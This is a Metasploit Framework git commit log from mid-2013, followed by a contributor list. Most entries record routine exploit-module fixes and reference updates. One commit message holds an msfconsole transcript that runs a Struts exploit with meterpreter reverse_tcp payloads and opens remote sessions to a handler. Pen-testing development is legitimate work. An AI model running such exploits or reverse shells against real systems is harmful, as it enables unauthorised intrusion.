f0c81ed3cc
Correct disclosure date
2013-06-19 03:00:32 -05:00
67593d6ef4
Eh, PHP, not "php"
2013-06-19 02:34:49 -05:00
9c3bd12613
If I can't write, I want to know.
...
It's possible that the upload directory doesn't allow write, the
module should be aware of that. Other reasons may be possible.
2013-06-19 02:32:30 -05:00
19d868748d
Final version
2013-06-19 02:21:01 -05:00
90cad4b7fb
Land #1980 - Canon Printer Wireless Configuration Disclosure
2013-06-18 19:09:38 -05:00
abc3951ca2
Final touchup
2013-06-18 19:08:42 -05:00
6168eb7590
Land #1981 - Canon Wireless Printer Denial of Service
2013-06-18 19:04:48 -05:00
7d15dc379d
Make msftidy happy
2013-06-18 19:04:03 -05:00
5c1822ea17
Initial commit for havalite module
2013-06-18 19:00:42 -05:00
0533ca68dc
Added DoS result checking
...
Lowered the http timeout
2013-06-18 19:48:21 -04:00
8c28631d4b
Fixed the date format
...
Removed the rport option
These are items that were code-review for my other related module, so
I figured they should be done here too
2013-06-18 12:17:50 -04:00
7f1a913bdc
Code Review Feedback from wchen
...
Fixed the disclosure date format
Removed the rport option
Added a call to report_note to store the data
2013-06-18 12:13:19 -04:00
b514124997
Land #1979 - OSVDB update
2013-06-18 10:42:09 -05:00
fbd16a2f3e
Land #1978 - OSVDB update
2013-06-18 10:41:33 -05:00
1e46f7df48
Land #1977 - OSVDB update
2013-06-18 10:40:55 -05:00
d0ed9a6687
Land #1976 - OSVDB update
2013-06-18 10:40:00 -05:00
aa134b0bcc
Land #1973 , @wchen-r7's fix to handle ftp auth correctly
2013-06-18 09:34:55 -05:00
e278ac5061
add osvdb ref 91841
2013-06-18 06:41:30 -05:00
404a9f0669
add osvdb ref 89594
2013-06-18 06:25:57 -05:00
27158d89c7
add osvdb ref 89105
2013-06-18 06:15:29 -05:00
2afc90a8de
fix typos
2013-06-18 06:05:45 -05:00
2c3181b56b
add osvdb ref 90627
2013-06-18 05:59:39 -05:00
6c2d99c2bc
Land #1972 , @wchen-r7's patch for [FixRM:#4704]
2013-06-17 23:17:22 -05:00
070111a520
Land #1975 - Add CVE-2012-6081 (MoinMoin twikidraw Action Traversal)
2013-06-17 22:31:36 -05:00
3223ea799c
An invalid WritablePage option can result the same message as well.
2013-06-17 22:30:44 -05:00
044bd2101f
Authenticate against the page to modify
2013-06-17 20:34:02 -05:00
4ca9a88324
Tidying up grammar and titles
2013-06-17 16:49:14 -05:00
d877e4d489
Added CVE and disclosure date
2013-06-17 17:41:50 -04:00
df8c80e3d1
Added CVE and disclosure date
2013-06-17 17:40:36 -04:00
0bd6ca2a6a
Add module for CVE-2012-6081
2013-06-17 16:13:55 -05:00
820f589df0
Missed this one.
2013-06-17 15:52:53 -05:00
163d3e771b
Handle connect_login return value properly
...
Some modules ignore connect_login's return value, which may result
an EOF if send_cmd() is used later on. All the modules fixed are
the ones require auth according to the module description, or
CVE/vendor/OSVDB info.
2013-06-17 15:48:34 -05:00
8bdd89f68b
[FixRM:#4704] - Fix EOFError in filezilla_server_port
...
If login fails, the module shouldn't continue sending commands to
the server, otherwise this causes an EOF.
2013-06-17 14:24:01 -05:00
b51349ed77
Land #1968 , OSVDB reference for ManageEngine
2013-06-17 10:30:05 -05:00
c5b6507437
Land #1967 , OSVDB and EDB references for Horde
2013-06-17 10:27:14 -05:00
fed6427f16
Land #1884 , @morrisson's saprouter port scanner module
2013-06-17 08:38:10 -05:00
e37a0b871f
add osvdb ref 86562
2013-06-17 06:04:54 -05:00
6e57ecab59
add osvdb ref 79246 and edb ref 18492
2013-06-17 05:58:00 -05:00
e17ccdda3a
add osvdb ref 68662
2013-06-16 18:11:13 -05:00
d20f72a9fd
Fix indentation
2013-06-16 15:18:19 -05:00
f478eb51cf
s/disable/disabled/
2013-06-16 21:27:45 +02:00
3cd94f5025
Do final cleanup for infovista_enum
2013-06-16 11:50:40 -05:00
c243ed1be3
Land #1962 , @juushya infovista brute force module
2013-06-16 11:49:45 -05:00
fd026c5b34
Added References and Disclosure Date
2013-06-15 18:31:20 -04:00
3923bbeee9
Update
2013-06-15 18:28:58 -04:00
0494ac9218
Added Canon Wireless Printer DoS module
2013-06-15 18:23:04 -04:00
852fc33c13
Added feedback, cleanup, and simplified modes
2013-06-15 17:16:10 +01:00
0cf2751ec1
Land #1965 , OSVDB reference for pBot
2013-06-15 07:39:25 -05:00
d35dd73328
add osvdb ref 84913
2013-06-15 07:30:23 -05:00
638175a6be
Land #1964 , OSVDB reference for StorageWorks
2013-06-15 07:27:43 -05:00
0c6157694f
add osvdb ref 82087
2013-06-15 07:22:32 -05:00
6e8b844954
add osvdb ref 89611
2013-06-15 07:12:44 -05:00
63483a979d
add osvdb ref 89611
2013-06-15 07:09:26 -05:00
ba59434261
added infovista module
2013-06-15 17:16:26 +05:30
bd17e67f75
Land #1960 , lower ranking for MS13-009
2013-06-14 15:28:06 -05:00
2abf70a1ca
Lower ranking for MS13-009
...
We haven't been able to make this one more reliable, so todb suggests
we lower the ranking first.
2013-06-14 15:24:43 -05:00
d35c3469e8
Fix typo
...
EDB reference
2013-06-14 15:16:20 -05:00
7a11077834
Land #1923 , @juushya's module for rfcode brute forcing
2013-06-14 13:36:14 -05:00
0d384d23b8
Land #1954 - Fix resource_uri and mp4 file path
2013-06-14 13:15:17 -05:00
933ac88b44
Missing the file param that's needed to download the mp4
2013-06-14 13:13:48 -05:00
ae027a9efb
Final cleanup for rfcode_reader_enum
2013-06-14 13:09:48 -05:00
d2df3234f4
Land #1955 - mozilla_mchannel.rb undefined agent variable
2013-06-14 11:14:20 -05:00
223807d0df
Land #1956 - fix regex error for mozilla_reduceright.rb
2013-06-14 11:09:49 -05:00
6fbb782ada
Clean sap_router_portscanner
2013-06-13 10:08:44 -05:00
6188df1b3a
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken.
2013-06-13 14:03:55 +05:30
871f1b7c1f
updated prints with ip-port reference. msftidy check. module load check. go rf reader..
2013-06-12 00:53:58 +05:30
736bf120d9
added sname in report data, corrected :host to rhost, :port to rport. msftidy check. module load check. upping it.
2013-06-12 00:25:50 +05:30
5c078f5139
added report_note to store collected info. removed register rport for 80t. msftidy & module load checked. pushing it up.
2013-06-11 12:57:26 +05:30
ca0ab8d6ee
maxthon_history_xcs.rb - fix User-agent string
...
request.headers['User-agent'] is incorrect, it should be
request.headers['User-Agent'].
Downloaded following version from oldapps.com to confirm
the exploit code is wrong.
Supported Systems Windows 98, 2000 (Maxthon 2.5.15 Build
1000), XP, Vista, 7, 8
MD5 Checksum F3791637C886A46940876211209F82F4
SHA1 Checksum 039BB218245E5DC1BAB0F57298C68AC487F86323
Release Date 20 October, 2011 (2 years ago )
2013-06-11 13:37:21 +10:00
69c25014ae
Make msftidy happy
2013-06-13 18:58:38 -05:00
44ff3ec8d9
Land #1953 , @wchen-r7's fix around fileformat
2013-06-13 18:56:48 -05:00
12801430e3
Update both ultraiso files to the right fix
2013-06-13 18:44:19 -05:00
fd74390952
Clean monkey_headers
2013-06-13 18:07:35 -05:00
73aff97053
Land #1950 - Monkey HTTPD Header Parsing Denial-of-Service
...
This is the reviewed/updated version of pull request #1950 . We're
landing this one instead because the other one has a lot of
unnecessary commit messages.
2013-06-13 15:56:34 -05:00
0440c03c7a
Land #1934 - Fix UltraISO Exploit File Creation
2013-06-13 13:57:09 -05:00
81813a78fc
Fix module Name
2013-06-13 11:55:23 -05:00
afb2f83238
Add module for CVE-2012-1533
2013-06-12 14:40:53 -05:00
c38eabe481
Fix description, code and perform test
2013-06-12 11:07:03 -05:00
5c8053491f
Add DEP bypass for ntdll ms12-001
2013-06-12 10:41:05 -05:00
a1c7961cbc
Suport js obfuscation for the trigger
2013-06-12 08:06:12 -05:00
5240c6e164
Add module for MS13-037 CVE-2013-2551
2013-06-12 07:37:57 -05:00
45da645717
Update ff svg exploit description to be more accurate.
2013-06-11 12:12:18 -05:00
2874aead2e
Land #1938 - Change sevone_enum because it's an Scanner
2013-06-11 11:42:18 -05:00
0578572d98
Change sevone_enum because it's an Scanner
2013-06-11 08:51:15 -05:00
081baad68c
Remove variable 'overflow' because it's not used
...
The 'overflow' variable isn't needed
2013-06-11 02:26:45 -05:00
4e41e871bb
mozilla_reduceright.rb - fix regex error.
...
[] is character class, and will match on 1, 6, 7, and |.
Where as (16|17) will match on either 16, or 17.
irb(main):053:0> y = /Firefox\/3\.6\.[16|17]/
=> /Firefox\/3\.6\.[16|17]/
irb(main):054:0> x = "Firefox/3.6.13"
=> "Firefox/3.6.13"
irb(main):055:0> x =~ y
=> 0
irb(main):056:0> y = /Firefox\/3\.6\.(16|17)/
=> /Firefox\/3\.6\.(16|17)/
irb(main):057:0> x =~ y
=> nil
2013-06-11 11:52:27 +10:00
996171b35f
mozilla_mchannel.rb undefined agent variable
...
If the TARGET is chosen instead of using the default
automatic, the agent variable will be undefined, which
causes the exploit to fail.
2013-06-11 10:43:47 +10:00
d91b412661
adobe_flash_sps.rb - resource_uri vs get_resource
...
resource_uri will randomize the returned uri unless
datastore['URIPATH"] is set.
get_resource will return the currently used reosurce_uri
Since the incorrect type is used, this exploit is completely broken.
Tested fix with both URIPATH set to / and unset, and it works after
redirect.
2013-06-11 07:13:02 +10:00
5b61f99ee6
Land #1933 - Update smart_hashdump Regular Expressions for Win 8 & 2012
2013-06-10 13:28:04 -05:00
0c6dbe9885
Add final cleanup for sevone_enum
2013-06-10 13:16:22 -05:00
6765a911a4
Land #1921 , @juushya brute force login module for SevOne
2013-06-10 13:15:14 -05:00
622dc27d95
Land #1925 - fix SNMP enum module failing to catch some fail cases
...
[FixRM:#7945]
2013-06-10 12:51:02 -05:00
72a9c8612b
setting rfcode_reader_enum straight. more updates.
2013-06-10 22:57:00 +05:30
5c988d99fe
more updates to sevone.rb. hopefully all is covered..
2013-06-10 21:59:18 +05:30
0895184e1f
Land #1932 - Actually support OUTPUTPATH datastore option
2013-06-10 11:22:28 -05:00
04171c46ec
more updates to sevone.rb. hopefully all is covered.
2013-06-10 21:47:56 +05:30
f58e279066
Cleanup on module names, descriptions.
2013-06-10 10:52:22 -05:00
3fbbe3e7b3
Make msftidy happy
2013-06-10 08:16:15 -05:00
3c05cf4382
Land #1842 , @viris DoS module for cve-2013-0229
2013-06-10 08:15:45 -05:00
154894bda6
Added comments and merged jvazquez-r7-miniupnp_dos_clean branch.
2013-06-10 10:18:26 +02:00
a9df55c27a
Add Windows 2012 to regex matching
2013-06-09 20:46:44 -04:00
8e83f0ee30
Add Windows 8 and 2012 to regex matching
2013-06-09 20:41:46 -04:00
cd64e3593c
Fix UltraISO file creation
...
This makes file creation where datastore['FILENAME'] is not used when
a different filename is required, and ends up creating files in the
wrong place.
2013-06-09 12:37:34 +10:00
c6b4290fea
Fix UltraISO Exploit File Creation
...
Both ultraiso_ccd.rb and ultraiso_cue.rb use File.open to create
files, instead of using the create_file() function. This leads
to files being created in the wrong directory.
We work around this by dynamically changing the
file_format_filename function to return the corrected filename.
2013-06-09 09:51:15 +10:00
cb79aa252a
Fix output path in ms10_004_textbytesatom.rb
...
ms10_004_textbytesatom.rb does not write to the local data directory,
instead it writes to the metasploit path (at least, that's where I
started msfrpcd).
This fixes it by using Msf::Config.local_directory
2013-06-09 07:28:48 +10:00
f55edac0ca
Title and description update
2013-06-07 22:38:53 -05:00
a510084f1c
Description change.
2013-06-07 22:35:46 -05:00
600494817d
Fix typo and target name
2013-06-07 21:08:38 -05:00
9025b52951
make the payload build more clear
2013-06-07 18:05:11 -05:00
d76e14fc9c
Add module for OSVDB 93004 - Exim Dovect exec
2013-06-07 17:59:04 -05:00
ffa18d413f
Updated rfcode_reader_enum.rb ...
...
Updated as per review comments.
Removed loot of network configuration.
Used JSON.parse to bring cleaner loot output
Changed some print_goods to vprint_status
Changed if not to unless
2013-06-08 03:21:43 +05:30
74bddcf339
Update sevone_enum.rb
...
New updates as per review comments
2013-06-08 02:28:09 +05:30
aefcc51704
Land #1924 - Java pwn2own 2013: java_jre17_driver_manager (CVE-2013-1488)
2013-06-07 15:12:09 -05:00
1ca8fd2cf1
Update sevone_enum.rb
...
Updated as per initial review comments.
2013-06-08 01:14:43 +05:30
eb0ae6ed27
Update rfcode_reader_enum.rb
...
Updated as per review comments
2013-06-08 01:00:18 +05:30
79bfdf3ca6
Add comment to explain the applet delivery methods
2013-06-07 14:20:21 -05:00
2bb0bd504c
Makign changes recommended in redmine 7945 to fix SNMP enum module failing to catch some fail cases
2013-06-07 13:55:59 -05:00
641fd3c6ce
Add also the msf module
2013-06-07 13:39:19 -05:00
6b8e6b3f0c
Create rfcode_reader_enum.rb
...
Adding new aux - RFCode Reader Web interface Login Brute Force & Config Capture Utility
2013-06-07 23:53:09 +05:30
fcc600aa3e
Create sevone_enum.rb
...
Adding new aux - SevOne Network Performance Management System application version enumeration and brute force login Utility
2013-06-07 23:39:22 +05:30
a157e65802
Land #1916 , @wchen-r7's exploit for Synactics PDF
2013-06-07 12:11:45 -05:00
ea2895ac13
Change to AverageRanking
...
Just to play with the firing order for Browser Autopwn, this one
should fire as late as possible.
2013-06-07 12:08:51 -05:00
9c7b446532
Updates description about default browser setting
2013-06-07 11:58:31 -05:00
0302437c2b
Land #1915 , smtp user enumeration enhancements
2013-06-07 11:42:41 -05:00
f3421f2c3a
Fix different landings
2013-06-07 10:26:04 -05:00
da4b18c6a1
[FixRM:#8012] - Fix message data type to int
...
This patch makes sure s.message is actually an int, that way we can
properly stop or enable the service.
2013-06-06 23:49:14 -05:00
e559824dc8
Remove whitespace
2013-06-06 20:08:50 -05:00
d3e57ffc46
Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
...
This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx. When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.
2013-06-06 20:05:08 -05:00
8cf5b548c3
make recommended changes
2013-06-06 14:23:25 -05:00
067899341e
fix a number of issues with the existing module (slowness, false positives, false negatives, stack traces, enumering unix users on windows systems, etc)
2013-06-06 13:26:04 -05:00
ec52795182
Clean for miniupnp_dos.rb
2013-06-06 11:19:26 -05:00
4d26299de3
add osvdb ref 93881 and edb ref 21191
2013-06-05 18:57:33 -05:00
1596fb478a
Land #1886 , awk bind shell
2013-06-05 09:05:37 -05:00
8ffa4ac9ac
Land #1885 , awk reverse shell
2013-06-05 09:04:49 -05:00
f6977c41c3
Modifications done in each PR.
2013-06-05 07:55:05 -03:00
b20401ca8c
Modifications done in each PR.
2013-06-05 07:51:10 -03:00
6d3dcf0cef
Land #1912 - Fixed check for Admins SID in whoami /group output
2013-06-05 02:55:38 -05:00
a3b25fd7c9
Land #1909 - Novell Zenworks Mobile Device Managment exploit & auxiliary
2013-06-05 02:45:45 -05:00
307773b6a1
Extra space - die!
2013-06-05 02:44:56 -05:00
0c1d46c465
Add more references
2013-06-05 02:43:43 -05:00
46aa6d38f8
Add a check for it
2013-06-05 02:41:03 -05:00
a270d37306
Take apart the version detection code
2013-06-05 02:34:35 -05:00
25fe03b981
People like this format better: IP:PORT - Message
2013-06-05 02:26:18 -05:00
02e29fff66
Make msftidy happy
2013-06-05 02:25:08 -05:00
35459f2657
Small name change, don't mind me
2013-06-05 02:18:11 -05:00
227fa4d779
Homie needs a default target
2013-06-05 02:16:59 -05:00
5d90c6cd71
Make msftidy happy
2013-06-05 02:11:23 -05:00
ca5155f01d
Final touchup novell_mdm_creds
2013-06-05 02:08:55 -05:00
a5a3f40394
Report auth info
2013-06-05 02:06:32 -05:00
34243165c5
Some changes with improvements.
2013-06-04 21:22:10 -03:00
e2988727fb
Some changes with improvements.
2013-06-04 21:10:51 -03:00
1032663cd4
Fixed check for Administrators SID in whoami /group output
2013-06-04 18:34:06 -04:00
e70221a993
Land #1903 - Add decryptioin for firefox_creds
2013-06-04 11:38:03 -05:00
cb31772302
Fix indent
2013-06-04 11:37:16 -05:00
ed4766dc46
initial commit of novell mdm modules
2013-06-04 09:20:10 -07:00
3111013991
Minor cleanup for miniupnpd_soap_bof
2013-06-04 08:53:52 -05:00
6497e5c7a1
Move exploit under the linux tree
2013-06-04 08:53:18 -05:00
0bf2f51622
Land #1843 , @viris exploit for CVE-2013-0230
2013-06-04 08:52:09 -05:00
2fe704ce38
Deleted undeeded comments and spaces.
2013-06-04 09:00:53 +02:00
8ced3483de
Deleted some undeeded comments and used the text_rand function rather than static values.
2013-06-04 08:44:47 +02:00
ad87065b9a
Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb
2013-06-04 01:35:13 -05:00
71bc06d576
Fix undefined variable in tomcat_mgr_deploy.rb
...
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯 in `call'
lib/msf/core/thread_manager.rb💯 in `block in spawn'
Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
30a019e422
Land #1891 , @wchen-r7's improve for ie_cgenericelement_uaf
2013-06-03 15:35:43 -05:00
055e0a222c
Land #1902 , OSVDB reference for memcached
2013-06-03 14:57:43 -05:00
4cf682691c
New module title and description fixes
2013-06-03 14:40:38 -05:00
b087951118
Add OSVDB reference 92867 for Memcached DoS module
2013-06-03 12:41:33 -05:00
116e2bb418
Landing #1782 - Added Memcached Remote Denial of Service module
2013-06-03 12:30:37 -05:00
3d9dcbf5bd
Add a check to see if the host is down
2013-06-03 12:26:57 -05:00
423a33b1fc
Added firefox pw decryption support
2013-06-03 13:13:59 -04:00
c705928052
Landing #1899 - Add OSVDB ref 85462 for esva_exec.rb
2013-06-03 10:40:31 -05:00
76faba60b7
add osvdb ref 85462
2013-06-03 06:16:43 -05:00
e612a3d017
add osvdb ref 77183
2013-06-03 05:42:56 -05:00
217b263af7
Moved the module to different location and make it msftidy.rb compliant.
2013-06-03 10:35:10 +02:00
df20e79375
Deleted the handle because it's not required and check() function.
2013-06-03 10:18:43 +02:00
36f275d71a
Changed the send_request_raw into send_request_cgi function.
2013-06-03 10:06:24 +02:00
675fbb3045
Deleted the DoS UPnP modules, because they are not relevant to the current branch.
2013-06-03 09:45:29 +02:00
1ceed1e44a
Added corrected MiniUPnP module.
2013-06-03 09:37:04 +02:00
d656360c24
Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability
2013-06-03 09:37:03 +02:00
39e4573d86
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-06-03 09:37:03 +02:00
e74c1d957f
Landing #1897 - Add OSVDB ref 93444 for mutiny_frontend_upload.rb
2013-06-03 02:15:35 -05:00
093830d725
Landing #1896 - Add OSVDB ref 82925 for symantec_web_gateway_exec.rb
2013-06-03 02:13:34 -05:00
57f9cc3643
Landing #1895 - Add OSVDB ref 56992 for sock_sendpage.rb
2013-06-03 02:12:23 -05:00
c2c630c338
add osvdb ref 93444
2013-06-02 21:03:44 -05:00
bc993b76fc
add osvdb ref 82925
2013-06-02 20:43:16 -05:00
ae17e9f7b5
add osvdb ref 56992
2013-06-02 18:32:46 -05:00
571b62d19d
svn scanner added print_good and rport
2013-06-02 18:05:11 -04:00
cb33c5685f
Landing #1890 - Oracle WebCenter Content openWebdav() vulnerability
2013-06-02 12:35:40 -05:00
61c8861fcf
add osvdb ref
2013-06-02 08:33:42 -05:00
cc951e3412
Modifies the exploit a little for better stability
...
This patch makes sure the LFH is enabled before the CGenericElement
object is created. Triggers is also modified a little.
2013-06-02 03:02:42 -05:00
1917961904
Land #1888 , @swtornio's update for OSVDB references
2013-06-01 16:36:59 -05:00
5939ca8ce4
Add analysis at the end of the module
2013-06-01 15:59:17 -05:00
9be8971bb0
Add module for ZDI-13-094
2013-06-01 15:44:01 -05:00
8671ae9de7
add osvdb ref
2013-06-01 14:27:50 -05:00
80f1e98952
added osvdb refs
2013-06-01 07:04:43 -05:00
f8e9535c39
Add ZDI reference
2013-05-31 20:50:53 -05:00
d679946b7f
Landing #1713 - add_sub encoder for x86 payloads
2013-05-31 18:49:08 -05:00
2ac0d25413
Fixes e-mail format, also a whitespace
2013-05-31 18:47:46 -05:00
d318c1cd22
included feedback
2013-06-01 00:31:06 +01:00
d9609fb03e
Was breaking with repeated commands
2013-05-31 18:44:48 -03:00
90117c322c
Landing #1874 - Post API cleanup
2013-05-31 16:15:23 -05:00
e99401ea82
Landing #1817 - couchdb login module
2013-05-31 16:04:10 -05:00
a88321c700
Final touchup
2013-05-31 16:03:30 -05:00
483b5e204f
Missing the header
2013-05-31 16:00:36 -05:00
e398025a7f
I don't think what fails really matters.
2013-05-31 15:59:40 -05:00
4f6d80c813
Land #1804 , user-settable filename for psexec
2013-05-31 13:34:52 -05:00
5964d36c40
Fix a syntax error
...
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
2013-05-31 13:31:36 -05:00
146a30ec4d
Do minor cleanup for struts_include_params
2013-05-31 01:01:15 -05:00
a7a754ae1f
Land #1870 , @Console exploit for Struts includeParams injection
2013-05-31 00:59:33 -05:00
9c771435f2
Touchup on author credit
2013-05-30 16:13:40 -05:00
dc014ede36
Land #1821 , x64_reverse_https payload
2013-05-30 16:09:33 -05:00
d0489b5d1e
Delete some commas
2013-05-30 14:25:53 -05:00
6abb591428
Do minor cleanup for lianja_db_net
2013-05-30 14:25:05 -05:00
38e5c2bed2
Land #1877 , @zeroSteiner's exploit for Lianja SQL
2013-05-30 14:23:45 -05:00
67128a3841
Land #1821 , x64_reverse_https stagers
2013-05-30 13:55:13 -05:00
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
70e1379338
Use msvcrt in ropdb for stability.
2013-05-30 11:13:22 -04:00
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
d03379f1c6
changed 2 vprint_error to print_error
2013-05-30 11:54:42 +01:00
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
00debd01c6
Listen for a connection and spawn a command shell via AWK
2013-05-29 21:22:49 -03:00
d4a864c29f
Creates an interactive shell via AWK (reverse)
2013-05-29 21:19:08 -03:00
07203568bd
Performed changes to the correct operation of the module.
2013-05-29 20:50:28 -03:00
07c99f821e
Land #1879 , @dcbz ARM stagers
2013-05-29 17:43:37 -05:00
612eabd21a
added sap_router_portscanner module
2013-05-29 23:36:53 +01:00
f76a50ae38
Land #1881 , @todb's fix for Redmine Bug 7991
2013-05-29 16:17:18 -05:00
e7a1f06fbc
Modules shouldn't be +x
2013-05-29 15:11:35 -05:00
7c41e239b4
Fix author name
2013-05-29 14:19:10 -05:00
52aae8e04c
Add small fixes for stagers
2013-05-29 14:01:59 -05:00
10d8bebe73
Start with a random username to test 401 codes
...
SeeRM #7991
While this fixes the specific case of tomcat_mgr_login, it doesn't
address the general case where modules are attempting to test code 401
responses in order to determine if bruteforcing should continue.
2013-05-29 12:36:28 -05:00
f0e3b0c124
Merge pull request #1836 from dmaloney-r7/bug/anyuser_anypass_http
...
Verified MSF specs passing, Pro on develop functional tests working (ran Bruteforce, saw normal and verbose output concerning that bruteforce was skipped for such a case and why, verified no cred saved with 'anyuser' user).
2013-05-29 07:44:18 -07:00
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
c3ab1ed2a5
Exploit module for Lianja SQL 1.0.0RC5.1
2013-05-29 08:48:41 -04:00
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
2c0f0f5f04
Changed reverse payload as suggested.
2013-05-28 21:52:16 -05:00
07c3565e3c
Made changes as suggested, forgot to remove exit() after testing was complete.
2013-05-28 21:31:36 -05:00
ed5b8895bb
Fixes smart_migrate for a TypeError bug
...
Bug is: TypeError can't convert Rex::RuntimeError into String
[SeeRM: #7984 ]
2013-05-28 18:45:49 -05:00
63694a6c87
Landing #1875 - Also remove *.ts.rb files
2013-05-28 17:29:02 -05:00
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
14c4dbcf8c
Also remove *.ts.rb files
...
On the heels of #1862 , this gets rid of the "test suites" that bound
together all the old unit tests.
2013-05-28 17:05:44 -05:00
a486fff9a4
Land #1872 , @wchen-r7's improvement of cold_fusion_version
2013-05-28 16:35:45 -05:00
96888455a7
Add new signature for CF9
2013-05-28 16:04:08 -05:00
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
deea66b76f
Landing #1871 - fix an undefined variable bug in the DTP module
2013-05-28 15:13:20 -05:00
b9969a8b2b
Landing #1855 - Updates for coldfusion_pwd_props for CF9 by ringt
2013-05-28 14:43:09 -05:00
sinn3r
Matt Andreko
jvazquez-r7
Steve Tornio
Tod Beardsley
William Vu
root
Bruno Morisson
KarnGaneshen
Ruslaideemin
Joe Vennix
Dejan Lukan
Carlos Perez
Thomas Ring
James Lee
Roberto Soares Espreto
cbgabriel
steponequit
xard4s
CG
Console
Spencer McIntyre
Samuel Huckins
dcbz